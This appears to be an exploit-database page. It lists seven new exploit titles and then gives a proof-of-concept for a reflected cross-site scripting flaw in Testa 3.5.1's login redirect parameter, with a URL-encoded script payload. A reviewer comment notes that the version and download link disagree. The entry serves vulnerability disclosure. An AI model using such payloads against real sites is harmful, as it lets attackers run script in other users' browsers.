
7 changes to exploits/shellcodes

Teleport v10.1.1 - Remote Code Execution (RCE)
TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)
Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)
Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)
Aero CMS v0.0.1 - SQLi
Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
20 lines
No EOL
686 B
Text
# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
# Date: 28/08/2022
# Exploit Author: Ashkan Moghaddas
# Vendor Homepage: https://testa.cc
# Software Link:
https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
# Version: 3.5.1
# Tested on: Windows/Linux

# Proof of Concept:
# 1- Install Testa 3.5.1
# 2- Go to https://localhost.com/login.php?redirect=XXXX
# 3- Add payload to the Tab, the XSS Payload:
%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
# 4- XSS has been triggered.

# Go to this url "
https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
"
XSS will trigger.
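Review bot: the header disagrees with itself about the affected release. The title and the "# Version: 3.5.1" line say 3.5.1, while the "# Software Link:" URL points at Testa_wos_2.0.1.zip, so a reader cannot tell which build was tested. Please either link the 3.5.1 package or state that 2.0.1 is the archive that was used. Two smaller documentation points in the proof-of-concept steps: step 3 ("Add payload to the Tab") never names the injection point, which the final URL shows to be the redirect query parameter of login.php, so the entry should state that parameter explicitly. Also, https://localhost.com is a public hostname, not a loopback address, and a neutral placeholder for the test host would be clearer. Since the payload opens with %22%3E, the entry could also note that the value appears to be reflected inside a double-quoted attribute, which tells maintainers that the redirect value needs output encoding and validation on that page.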